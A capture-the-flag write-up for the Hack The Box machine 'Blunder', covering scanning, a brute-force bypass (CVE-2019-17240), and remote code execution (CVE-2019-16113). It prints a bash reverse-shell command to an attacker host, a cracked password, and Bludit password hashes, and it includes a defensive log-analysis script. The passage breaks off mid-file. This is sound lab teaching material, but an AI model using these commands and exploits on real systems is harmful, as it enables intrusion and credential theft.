Blunder-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: directory scanning, exploiting CVE-2019-17240, wordlist generation with cewl, exploiting CVE-2019-16113, password leakage from configuration files, md5 password cracking, privilege escalation via the sudo 1.8.27 vulnerability

Reference: https://www.jgeek.cn/article/71

Reference: https://princerohit8800.medium.com/blunder-e39b2cfda153

0x01 Obtaining user access

1. Get the target's IP address: 10.10.10.191

2. Run a port scan to see which ports are open

┌─[us-vip-22]─[10.10.14.5]─[shiyan@htb-et8bwvyzp7]─[~/Desktop]
└──╼ [★]$ sudo nmap -sC -sV -p- 10.10.10.191 --min-rate=5000
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-22 12:33 GMT
Nmap scan report for 10.10.10.191
Host is up (0.13s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-title: Blunder | A blunder of interesting facts
|_http-server-header: Apache/2.4.41 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 202.55 seconds

3. Scan the web service on port 80 with nikto

┌─[us-vip-22]─[10.10.14.5]─[shiyan@htb-41ohbzuri8]─[~/Desktop]
└──╼ [★]$ nikto -h http://10.10.10.191
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.191
+ Target Hostname: 10.10.10.191
+ Target Port: 80
+ Start Time: 2023-12-22 13:47:21 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: Bludit
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /admin/config.php: PHP Config file may contain database IDs and passwords.
+ /admin/cplogfile.log: DevBB 1.0 final (http://www.mybboard.com) log file is readable remotely. Upgrade to the latest version.
+ /admin/system_footer.php: myphpnuke version 1.8.8_final_7 reveals detailed system information.
+ OSVDB-3233: /admin/admin_phpinfo.php4: Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected.
+ OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
+ OSVDB-376: /admin/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
+ OSVDB-2813: /admin/database/wwForum.mdb: Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein
+ OSVDB-2922: /admin/wg_user-info.ml: WebGate Web Eye exposes user names and passwords.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3093: /admin/auth.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cfg/configscreen.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cfg/configsite.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cfg/configsql.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cfg/configtache.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cms/htmltags.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/credit_card_info.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/exec.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/modules/cache.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/objects.inc.php4: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/script.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/settings.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/templates/header.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/upload.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-4238: /admin/adminproc.asp: Xpede administration page may be available. The /admin directory should be protected.
+ OSVDB-4239: /admin/datasource.asp: Xpede page reveals SQL account name. The /admin directory should be protected.
+ OSVDB-9624: /admin/admin.php?adminpy=1: PY-Membres 4.2 may allow administrator access.
+ OSVDB-3092: /install.php: install.php file found.
+ /admin/account.asp: Admin login page/section found.
+ /admin/account.html: Admin login page/section found.
+ /admin/account.php: Admin login page/section found.
+ /admin/controlpanel.asp: Admin login page/section found.
+ /admin/controlpanel.html: Admin login page/section found.
+ /admin/controlpanel.php: Admin login page/section found.
+ /admin/cp.asp: Admin login page/section found.
+ /admin/cp.html: Admin login page/section found.
+ /admin/cp.php: Admin login page/section found.
+ /admin/home.asp: Admin login page/section found.
+ /admin/home.php: Admin login page/section found.
+ /admin/index.asp: Admin login page/section found.
+ /admin/index.html: Admin login page/section found.
+ /admin/login.asp: Admin login page/section found.
+ /admin/login.html: Admin login page/section found.
+ /admin/login.php: Admin login page/section found.
+ /admin/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /admin/status: Tomcat Server Status interface found (pass protected)
+ /admin/sites/new: ComfortableMexicanSofa CMS Engine Admin Backend (pass protected)
+ /.gitignore: .gitignore file found. It is possible to grasp the directory structure.
+ 26494 requests: 0 error(s) and 54 item(s) reported on remote host
+ End Time: 2023-12-22 13:52:23 (GMT0) (302 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


*********************************************************************
Portions of the server's headers (Apache/2.4.41) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?

4. Run a directory scan with gobuster

┌─[us-vip-22]─[10.10.14.5]─[shiyan@htb-41ohbzuri8]─[~/Desktop]
└──╼ [★]$ gobuster dir -u http://10.10.10.191 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.191
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2023/12/22 14:12:03 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/0 (Status: 200) [Size: 7562]
/about (Status: 200) [Size: 3281]
/admin (Status: 301) [Size: 0] [--> http://10.10.10.191/admin/]
/cgi-bin/ (Status: 301) [Size: 0] [--> http://10.10.10.191/cgi-bin]
/LICENSE (Status: 200) [Size: 1083]
/robots.txt (Status: 200) [Size: 22]
/server-status (Status: 403) [Size: 277]

===============================================================
2023/12/22 14:12:16 Finished
===============================================================

5. Run a second directory scan with dirsearch as a cross-check

┌─[us-vip-22]─[10.10.14.5]─[shiyan@htb-41ohbzuri8]─[~/Desktop]
└──╼ [★]$ git clone https://github.com/maurosoria/dirsearch
Cloning into 'dirsearch'...
remote: Enumerating objects: 11745, done.
remote: Counting objects: 100% (165/165), done.
remote: Compressing objects: 100% (106/106), done.
remote: Total 11745 (delta 86), reused 119 (delta 59), pack-reused 11580
Receiving objects: 100% (11745/11745), 21.57 MiB | 27.57 MiB/s, done.
Resolving deltas: 100% (7703/7703), done.
┌─[us-vip-22]─[10.10.14.5]─[shiyan@htb-41ohbzuri8]─[~/Desktop]
└──╼ [★]$ cd dirsearch/
┌─[us-vip-22]─[10.10.14.5]─[shiyan@htb-41ohbzuri8]─[~/Desktop/dirsearch]
└──╼ [★]$ pip3 install -r requirements.txt
┌─[us-vip-22]─[10.10.14.5]─[shiyan@htb-41ohbzuri8]─[~/Desktop/dirsearch]
└──╼ [★]$ dir
dir dirbuster dirmngr-client dirsplit
dirb dircolors dirname
dirb-gendict dirmngr dirs
┌─[us-vip-22]─[10.10.14.5]─[shiyan@htb-41ohbzuri8]─[~/Desktop/dirsearch]
└──╼ [★]$ python3 ./dirsearch.py -u http://10.10.10.191

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11715

Output: /home/shiyan/Desktop/dirsearch/reports/http_10.10.10.191/_23-12-22_14-19-30.txt

Target: http://10.10.10.191/

[14:19:30] Starting:
[14:19:36] 200 - 955B - /.github/
[14:19:36] 200 - 563B - /.gitignore
[14:19:36] 404 - 274B - /.gitignore/
[14:19:37] 403 - 277B - /.ht_wsr.txt
[14:19:37] 403 - 277B - /.htaccess.bak1
[14:19:37] 403 - 277B - /.htaccess.orig
[14:19:37] 403 - 277B - /.htaccess.sample
[14:19:37] 403 - 277B - /.htaccess.save
[14:19:37] 403 - 277B - /.htaccess_orig
[14:19:37] 403 - 277B - /.htaccess_sc
[14:19:38] 403 - 277B - /.htaccessOLD2
[14:19:38] 403 - 277B - /.htm
[14:19:37] 403 - 277B - /.htaccess_extra
[14:19:38] 403 - 277B - /.htaccessBAK
[14:19:38] 403 - 277B - /.htaccessOLD
[14:19:38] 403 - 277B - /.httr-oauth
[14:19:38] 403 - 277B - /.htpasswds
[14:19:38] 403 - 277B - /.htpasswd_test
[14:19:38] 403 - 277B - /.html
[14:19:44] 403 - 277B - /.php
[14:19:44] 403 - 277B - /.php3
[14:19:56] 200 - 3KB - /about
[14:20:01] 301 - 0B - /admin -> http://10.10.10.191/admin/
[14:20:02] 200 - 2KB - /admin/.config
[14:20:02] 200 - 2KB - /admin/_logs/error-log
[14:20:02] 200 - 2KB - /admin/.htaccess
[14:20:02] 200 - 2KB - /admin/_logs/access.log
[14:20:02] 200 - 2KB - /admin/access.log
[14:20:03] 200 - 2KB - /admin/_logs/login.txt
[14:20:03] 200 - 2KB - /admin/_logs/error_log
[14:20:03] 200 - 2KB - /admin/
[14:20:03] 200 - 2KB - /admin/account.aspx
[14:20:03] 200 - 2KB - /admin/_logs/access-log
[14:20:03] 200 - 2KB - /admin/account
[14:20:03] 200 - 2KB - /admin/account.jsp
[14:20:02] 200 - 2KB - /admin/_logs/error.log
[14:20:02] 200 - 2KB - /admin/access.txt
[14:20:03] 200 - 2KB - /admin/admin-login
[14:20:03] 200 - 2KB - /admin/access_log
[14:20:03] 200 - 2KB - /admin/account.js
[14:20:02] 200 - 2KB - /admin/%3bindex/
[14:20:03] 200 - 2KB - /admin/admin-login.js
[14:20:03] 200 - 2KB - /admin/admin-login.html
[14:20:03] 200 - 2KB - /admin/admin
[14:20:03] 200 - 2KB - /admin/admin.aspx
[14:20:03] 200 - 2KB - /admin/admin.php
[14:20:03] 200 - 2KB - /admin/account.html
[14:20:03] 200 - 2KB - /admin/admin-login.aspx
[14:20:04] 200 - 2KB - /admin/admin_login
[14:20:04] 200 - 2KB - /admin/admin_login.aspx
[14:20:03] 200 - 2KB - /admin/_logs/access_log
[14:20:04] 200 - 2KB - /admin/admin_login.html
[14:20:03] 200 - 2KB - /admin/account.php
[14:20:04] 200 - 2KB - /admin/adminLogin.jsp
[14:20:04] 200 - 2KB - /admin/admin_login.js
[14:20:02] 200 - 2KB - /admin/_logs/err.log
[14:20:04] 200 - 2KB - /admin/adminLogin
[14:20:04] 200 - 2KB - /admin/adminLogin.aspx
[14:20:04] 200 - 2KB - /admin/admin_login.jsp
[14:20:03] 200 - 2KB - /admin/admin-login.php
[14:20:04] 200 - 2KB - /admin/backup/
[14:20:03] 200 - 2KB - /admin/admin-login.jsp
[14:20:04] 200 - 2KB - /admin/backups/
[14:20:04] 200 - 2KB - /admin/adminLogin.js
[14:20:04] 200 - 2KB - /admin/admin_login.php
[14:20:04] 200 - 2KB - /admin/adminLogin.php
[14:20:03] 200 - 2KB - /admin/admin.js
[14:20:04] 200 - 2KB - /admin/controlpanel
[14:20:04] 200 - 2KB - /admin/controlpanel.php
[14:20:04] 200 - 2KB - /admin/controlpanel.html
[14:20:04] 200 - 2KB - /admin/adminLogin.html
[14:20:04] 200 - 2KB - /admin/config.php
[14:20:05] 200 - 2KB - /admin/controlpanel.js
[14:20:03] 200 - 2KB - /admin/admin.html
[14:20:05] 200 - 2KB - /admin/cp.aspx
[14:20:03] 200 - 2KB - /admin/admin.jsp
[14:20:05] 200 - 2KB - /admin/cp.html
[14:20:05] 200 - 2KB - /admin/cp.jsp
[14:20:05] 200 - 2KB - /admin/db/
[14:20:05] 200 - 2KB - /admin/data/autosuggest
[14:20:04] 200 - 2KB - /admin/controlpanel.jsp
[14:20:05] 200 - 2KB - /admin/default
[14:20:04] 200 - 2KB - /admin/adminer.php
[14:20:05] 200 - 2KB - /admin/default.asp
[14:20:05] 200 - 2KB - /admin/cp.php
[14:20:05] 200 - 2KB - /admin/download.php
[14:20:05] 200 - 2KB - /admin/errors.log
[14:20:05] 200 - 2KB - /admin/error.txt
[14:20:05] 200 - 2KB - /admin/default/admin.asp
[14:20:05] 200 - 2KB - /admin/error.log
[14:20:05] 200 - 2KB - /admin/error_log
[14:20:04] 200 - 2KB - /admin/admin/login
[14:20:05] 200 - 2KB - /admin/cp.js
[14:20:05] 200 - 2KB - /admin/default/login.asp
[14:20:05] 200 - 2KB - /admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
[14:20:05] 200 - 2KB - /admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
[14:20:05] 200 - 2KB - /admin/export.php
[14:20:05] 200 - 2KB - /admin/FCKeditor
[14:20:05] 200 - 2KB - /admin/dumper/
[14:20:06] 200 - 2KB - /admin/fckeditor/editor/filemanager/connectors/asp/upload.asp
[14:20:05] 200 - 2KB - /admin/cp
[14:20:06] 200 - 2KB - /admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
[14:20:06] 200 - 2KB - /admin/fckeditor/editor/filemanager/connectors/php/upload.php
[14:20:04] 200 - 2KB - /admin/controlpanel.aspx
[14:20:06] 200 - 2KB - /admin/fckeditor/editor/filemanager/upload/asp/upload.asp
[14:20:06] 200 - 2KB - /admin/fckeditor/editor/filemanager/upload/php/upload.php
[14:20:06] 200 - 2KB - /admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
[14:20:06] 200 - 2KB - /admin/file.php
[14:20:06] 200 - 2KB - /admin/files.php
[14:20:06] 200 - 2KB - /admin/fckeditor/editor/filemanager/connectors/php/connector.php
[14:20:05] 200 - 2KB - /admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
[14:20:05] 200 - 2KB - /admin/fckeditor/editor/filemanager/connectors/asp/connector.asp
[14:20:06] 200 - 2KB - /admin/home.php
[14:20:06] 200 - 2KB - /admin/home.aspx
[14:20:06] 200 - 2KB - /admin/includes/configure.php~
[14:20:06] 200 - 2KB - /admin/home.js
[14:20:06] 200 - 2KB - /admin/heapdump
[14:20:06] 200 - 2KB - /admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
[14:20:06] 200 - 2KB - /admin/home.jsp
[14:20:07] 200 - 2KB - /admin/index.php
[14:20:07] 200 - 2KB - /admin/index.html
[14:20:06] 200 - 2KB - /admin/home
[14:20:07] 200 - 2KB - /admin/js/tiny_mce/
[14:20:06] 200 - 2KB - /admin/index
[14:20:07] 200 - 2KB - /admin/index.jsp
[14:20:06] 200 - 2KB - /admin/home.html
[14:20:07] 200 - 2KB - /admin/login
[14:20:07] 200 - 2KB - /admin/index.js
[14:20:07] 200 - 2KB - /admin/log/error.log
[14:20:07] 200 - 2KB - /admin/js/tiny_mce
[14:20:07] 200 - 2KB - /admin/login.asp
[14:20:07] 200 - 2KB - /admin/js/tinymce/
[14:20:07] 200 - 2KB - /admin/login.do
[14:20:07] 200 - 2KB - /admin/log
[14:20:07] 200 - 2KB - /admin/login.htm
[14:20:07] 200 - 2KB - /admin/login.aspx
[14:20:07] 200 - 2KB - /admin/login.py
[14:20:07] 200 - 2KB - /admin/login.rb
[14:20:07] 200 - 2KB - /admin/login.jsp
[14:20:07] 200 - 2KB - /admin/login.js
[14:20:07] 200 - 2KB - /admin/logon.php
[14:20:07] 200 - 2KB - /admin/logon.aspx
[14:20:08] 200 - 2KB - /admin/logon.jsp
[14:20:08] 200 - 2KB - /admin/logon.html
[14:20:07] 200 - 2KB - /admin/logon
[14:20:08] 200 - 2KB - /admin/logon.js
[14:20:08] 200 - 2KB - /admin/logs/
[14:20:08] 200 - 2KB - /admin/logs/access.log
[14:20:08] 200 - 2KB - /admin/logs/access_log
[14:20:07] 200 - 2KB - /admin/login.php
[14:20:07] 200 - 2KB - /admin/login.html
[14:20:08] 200 - 2KB - /admin/logs/err.log
[14:20:07] 200 - 2KB - /admin/index.aspx
[14:20:07] 200 - 2KB - /admin/js/tinymce
[14:20:08] 200 - 2KB - /admin/logs/access-log
[14:20:08] 200 - 2KB - /admin/logs/errors.log
[14:20:08] 200 - 2KB - /admin/logs/error_log
[14:20:08] 200 - 2KB - /admin/manage
[14:20:08] 200 - 2KB - /admin/manage.asp
[14:20:08] 200 - 2KB - /admin/logs/error-log
[14:20:08] 200 - 2KB - /admin/manage/admin.asp
[14:20:08] 200 - 2KB - /admin/mysql/
[14:20:08] 200 - 2KB - /admin/manage/login.asp
[14:20:08] 200 - 2KB - /admin/mysql2/index.php
[14:20:08] 200 - 2KB - /admin/logs/error.log
[14:20:08] 200 - 2KB - /admin/logs/login.txt
[14:20:09] 200 - 2KB - /admin/phpMyAdmin/
[14:20:09] 200 - 2KB - /admin/phpmyadmin/
[14:20:09] 200 - 2KB - /admin/phpmyadmin2/index.php
[14:20:09] 200 - 2KB - /admin/phpMyAdmin/index.php
[14:20:09] 200 - 2KB - /admin/phpmyadmin/index.php
[14:20:08] 200 - 2KB - /admin/mysql/index.php
[14:20:09] 200 - 2KB - /admin/phpMyAdmin
[14:20:09] 200 - 2KB - /admin/PMA/index.php
[14:20:09] 200 - 2KB - /admin/pMA/
[14:20:09] 200 - 2KB - /admin/pma/index.php
[14:20:09] 200 - 2KB - /admin/portalcollect.php?f=http://xxx&t=js
[14:20:09] 200 - 2KB - /admin/release
[14:20:09] 200 - 2KB - /admin/pma/
[14:20:09] 200 - 2KB - /admin/private/logs
[14:20:09] 200 - 2KB - /admin/scripts/fckeditor
[14:20:09] 200 - 2KB - /admin/sqladmin/
[14:20:09] 200 - 2KB - /admin/secure/logon.jsp
[14:20:10] 200 - 2KB - /admin/sysadmin/
[14:20:10] 200 - 2KB - /admin/tiny_mce
[14:20:10] 200 - 2KB - /admin/uploads.php
[14:20:09] 200 - 2KB - /admin/signin
[14:20:10] 200 - 2KB - /admin/user_count.txt
[14:20:10] 200 - 2KB - /admin/web/
[14:20:10] 200 - 2KB - /admin/views/ajax/autocomplete/user/a
[14:20:09] 200 - 2KB - /admin/sxd/
[14:20:10] 200 - 2KB - /admin/tinymce
[14:20:09] 200 - 2KB - /admin/pol_log.txt
[14:20:10] 200 - 2KB - /admin/upload.php
[14:21:04] 200 - 30B - /install.php
[14:21:04] 200 - 30B - /install.php?profile=default
[14:21:09] 200 - 1KB - /LICENSE
[14:21:34] 200 - 3KB - /README.md
[14:21:41] 200 - 22B - /robots.txt
[14:21:43] 403 - 277B - /server-status
[14:21:43] 403 - 277B - /server-status/
[14:21:58] 200 - 118B - /todo.txt

Task Completed

6. The scanning is more or less done; now review the information gathered

7. The home page is a CMS-driven site

8. The admin page shows that the backend is Bludit

9. The page source of the admin backend reveals the current version number

10. The todo.txt file found by the directory scan appears to reveal a username

┌──(kali㉿kali)-[~/桌面]
└─$ curl http://10.10.10.191/todo.txt
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING

11. At this point we have two pieces of information: a probable username, fergus, and the CMS name and version, Bludit CMS 3.9.2

12. Search for related exploits with searchsploit

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit Bludit 3.9.2
------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------- ---------------------------------
Bludit 3.9.2 - Authentication Bruteforce Mitigation B | php/webapps/48746.rb
Bludit 3.9.2 - Auth Bruteforce Bypass | php/webapps/48942.py
Bludit 3.9.2 - Authentication Bruteforce Bypass (Metas | php/webapps/49037.rb
Bludit 3.9.2 - Directory Traversal | multiple/webapps/48701.txt
Bludit < 3.13.1 Backup Plugin - Arbitrary File Downloa | php/webapps/51541.py
------------------------------------------------------- ---------------------------------
Shellcodes: No Results

13. There is an Auth Bruteforce Bypass vulnerability here that can be used to brute-force the user's password

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m php/webapps/48942.py
Exploit: Bludit 3.9.2 - Auth Bruteforce Bypass
URL: https://www.exploit-db.com/exploits/48942
Path: /usr/share/exploitdb/exploits/php/webapps/48942.py
Codes: CVE-2019-17240
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/桌面/48942.py

14. A standard wordlist did not crack the password, so we use cewl to generate a wordlist from the target site's own content and try again with that

┌──(kali㉿kali)-[~/桌面]
└─$ cewl 10.10.10.191 > wordlist.txt

┌──(kali㉿kali)-[~/桌面]
└─$ echo fergus > user.txt

┌──(kali㉿kali)-[~/桌面]
└─$ python3 48942.py -l http://10.10.10.191/admin/login.php -u user.txt -p wordlist.txt
[*] Bludit Auth BF Mitigation Bypass Script by ColdFusionX
[.] Brute Force: Testing -> fergus:via
[▃] Brute Force: Testing -> fergus:him
[◓] Brute Force: Testing -> fergus:Distinguished
[◤] Brute Force: Testing -> fergus:Contribution
[┬] Brute Force: Testing -> fergus:Letters
[←] Brute Force: Testing -> fergus:probably
[▅] Brute Force: Testing -> fergus:best
[◤] Brute Force: Testing -> fergus:fictional
[o] Brute Force: Testing -> fergus:character
[█] Brute Force: Testing -> fergus:RolandDeschain

[*] SUCCESS !!
[+] Use Credential -> fergus:RolandDeschain

15. The user's password is now brute-forced: fergus:RolandDeschain
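As an added example (not part of the original writeup): CVE-2019-17240 exists because Bludit 3.9.2 keyed its failed-login counter on the client address taken from the X-Forwarded-For header, so a script can reset the counter on every attempt simply by changing that header. The Python below runs over constructed Apache access-log lines (combined format with an assumed extra quoted %{X-Forwarded-For}i field), groups login POSTs by the real TCP peer and flags any peer that presents many different forwarded-for values.

```python
import re
from collections import defaultdict

# Constructed Apache access-log lines. The format is "combined" plus one extra
# quoted field, %{X-Forwarded-For}i, appended via a custom LogFormat (assumed).
# Peer 10.10.14.5 stands in for a brute-force script: every POST to the Bludit
# login carries a fresh X-Forwarded-For value, which is what CVE-2019-17240 abuses.
SAMPLE_LOG = [
    '10.10.14.7 - - [22/Dec/2023:15:00:40 +0000] "GET /admin/login.php HTTP/1.1" 200 2101 "-" "Mozilla/5.0" "-"',
    '10.10.14.7 - - [22/Dec/2023:15:00:52 +0000] "POST /admin/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0" "-"',
] + [
    f'10.10.14.5 - - [22/Dec/2023:15:01:{i:02d} +0000] "POST /admin/login.php HTTP/1.1" 200 2101 "-" "python-requests/2.31" "203.0.113.{i}"'
    for i in range(12)
]

LOG_RE = re.compile(
    r'^(?P<peer>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)" "(?P<xff>[^"]*)"$'
)

LOGIN_PATH = "/admin/login.php"


def parse_line(line):
    """Return the named fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def login_attempts(lines):
    """Group login POSTs by the TCP peer address, ignoring what X-Forwarded-For claims.

    Returns {peer: {"attempts": int, "xff_values": set}}. Keying on the peer rather
    than the header is exactly the change that defeats the header-rotation bypass.
    """
    stats = defaultdict(lambda: {"attempts": 0, "xff_values": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != LOGIN_PATH:
            continue
        stats[rec["peer"]]["attempts"] += 1
        stats[rec["peer"]]["xff_values"].add(rec["xff"])
    return dict(stats)


def flag_xff_rotation(lines, min_attempts=10, min_distinct_xff=5):
    """Peers that hammer the login while presenting many different forwarded-for addresses.

    A genuine reverse proxy fronting many users also shows many XFF values, so the
    thresholds are a starting point; a peer that is not a known proxy should never
    need more than one value.
    """
    flagged = []
    for peer, s in login_attempts(lines).items():
        if s["attempts"] >= min_attempts and len(s["xff_values"]) >= min_distinct_xff:
            flagged.append(peer)
    return sorted(flagged)


if __name__ == "__main__":
    for peer in flag_xff_rotation(SAMPLE_LOG):
        s = login_attempts(SAMPLE_LOG)[peer]
        print(f"{peer}: {s['attempts']} login POSTs, {len(s['xff_values'])} distinct X-Forwarded-For values")
```

The same grouping applies to Bludit's own bl-content/databases/security.php blacklist: if entries there are keyed on addresses the web server never actually connected from, the header was being trusted.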

16. These credentials alone do not get us any further, so we search Google for an RCE: Bludit 3.9.2 RCE

17. This turns up CVE-2019-16113, which we try next

https://github.com/hg8/CVE-2019-16113-PoC

# edit these settings to match the target

url = "http://10.10.10.191"
user = "fergus"
password = "RolandDeschain"
cmd = "bash -c 'bash -i >& /dev/tcp/10.10.14.2/443 0>&1'"

18. It is exploitable, and we get an initial foothold

┌──(kali㉿kali)-[~/桌面]
└─$ python3 CVE-2019-16113.py
[+] Loggin successful.
[+] Token CSRF: 024f87d5d005111e913a8a8f9b84d4084e1b53f3
[+] Shell upload succesful.
[+] .htaccess upload succesful.
[+] Command Execution Successful.

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.191] 41598
bash: cannot set terminal process group (1257): Inappropriate ioctl for device
bash: no job control in this shell
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$

19. Initial enumeration suggests we need the hugo user's privileges to read the first user flag

www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ ls -la /home/
ls -la /home/
total 16
drwxr-xr-x 4 root root 4096 Apr 27 2020 .
drwxr-xr-x 21 root root 4096 Jul 6 2021 ..
drwxr-xr-x 16 hugo hugo 4096 May 26 2020 hugo
drwxr-xr-x 16 shaun shaun 4096 Jul 6 2021 shaun
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ ls -la /home/hugo
ls -la /home/hugo
total 80
drwxr-xr-x 16 hugo hugo 4096 May 26 2020 .
drwxr-xr-x 4 root root 4096 Apr 27 2020 ..
lrwxrwxrwx 1 root root 9 Apr 28 2020 .bash_history -> /dev/null
-rw-r--r-- 1 hugo hugo 220 Nov 28 2019 .bash_logout
-rw-r--r-- 1 hugo hugo 3771 Nov 28 2019 .bashrc
drwx------ 13 hugo hugo 4096 Apr 27 2020 .cache
drwx------ 11 hugo hugo 4096 Nov 28 2019 .config
drwx------ 3 hugo hugo 4096 Apr 27 2020 .gnupg
drwxrwxr-x 3 hugo hugo 4096 Nov 28 2019 .local
drwx------ 5 hugo hugo 4096 Apr 27 2020 .mozilla
-rw-r--r-- 1 hugo hugo 807 Nov 28 2019 .profile
drwx------ 2 hugo hugo 4096 Apr 27 2020 .ssh
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Desktop
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Documents
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Downloads
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Music
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Pictures
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Public
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Templates
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Videos
-r-------- 1 hugo hugo 33 Dec 22 14:38 user.txt
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ cat /home/hugo/user.txt
<ludit-3.9.2/bl-content/tmp$ cat /home/hugo/user.txt
cat: /home/hugo/user.txt: Permission denied
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$

20. Repeated enumeration of the current web directory turned up some information about the admin account and some password hashes, but they could not be cracked, and those passwords did not lead anywhere useful

www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ cd ../
cd ../
www-data@blunder:/var/www/bludit-3.9.2/bl-content$ ls
ls
databases
pages
tmp
uploads
workspaces
www-data@blunder:/var/www/bludit-3.9.2/bl-content$ cd databases
cd databases
www-data@blunder:/var/www/bludit-3.9.2/bl-content/databases$ ls
ls
categories.php
pages.php
plugins
security.php
site.php
syslog.php
tags.php
users.php
www-data@blunder:/var/www/bludit-3.9.2/bl-content/databases$ cat users.php
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Admin",
"firstName": "Administrator",
"lastName": "",
"role": "admin",
"password": "bfcc887f62e36ea019e3295aafb8a3885966e265",
"salt": "5dde2887e7aca",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""
},
"fergus": {
"firstName": "",
